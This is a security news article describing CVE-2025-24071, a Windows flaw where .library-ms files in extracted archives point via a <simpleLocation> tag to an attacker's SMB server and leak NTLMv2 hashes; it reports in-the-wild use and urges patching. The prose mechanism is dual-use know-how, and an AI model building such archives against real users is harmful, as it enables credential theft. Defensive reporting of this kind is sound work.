Security researchers have discovered and documented a critical Windows vulnerability (CVE-2025-24071) that enables attackers to steal authentication credentials without any user interaction. The vulnerability, recently patched in Microsoft's March 2025 Patch Tuesday update, exploits Windows Explorer's automatic file processing mechanisms.
The exploit works by embedding malicious SMB links within .library-ms files that are compressed in RAR or ZIP archives. When a victim extracts these archives, Windows Explorer automatically processes the .library-ms files to generate previews and index metadata—even if the user never clicks on or opens the extracted files.
According to the technical analysis, the .library-ms file format is XML-based and is trusted by Windows Explorer to define search and library locations.
The vulnerability exploits this trust by including a <simpleLocation> tag pointing to an attacker-controlled SMB server. When extracted, Windows automatically attempts to connect to this server, triggering an NTLM authentication handshake that exposes the victim's NTLMv2 hash.
Video PoC
Process monitoring tools confirm that Explorer.exe and SearchProtocolHost.exe automatically process these files immediately after extraction without user intervention. Wireshark captures further demonstrate that the extraction triggers SMB communication attempts, including an SMB2 Negotiate Protocol Request followed by an SMB2 Session Setup Request containing the NTLM authentication data.
The vulnerability is particularly concerning because the attack continues functioning even if the extracted file is moved to the trash. This allows the credential leak to persist until the malicious file is completely removed from the system.
Evidence suggests this vulnerability has been actively exploited in the wild.
Researchers discovered forum posts by a threat actor known as "Krypt0n" (reportedly the developer of "EncryptHub Stealer"), who was potentially offering the exploit for sale on underground forums.
A proof-of-concept code has been published on GitHub, allowing security professionals to better understand and mitigate this threat. Users are strongly advised to install Microsoft's March security updates to protect against this vulnerability.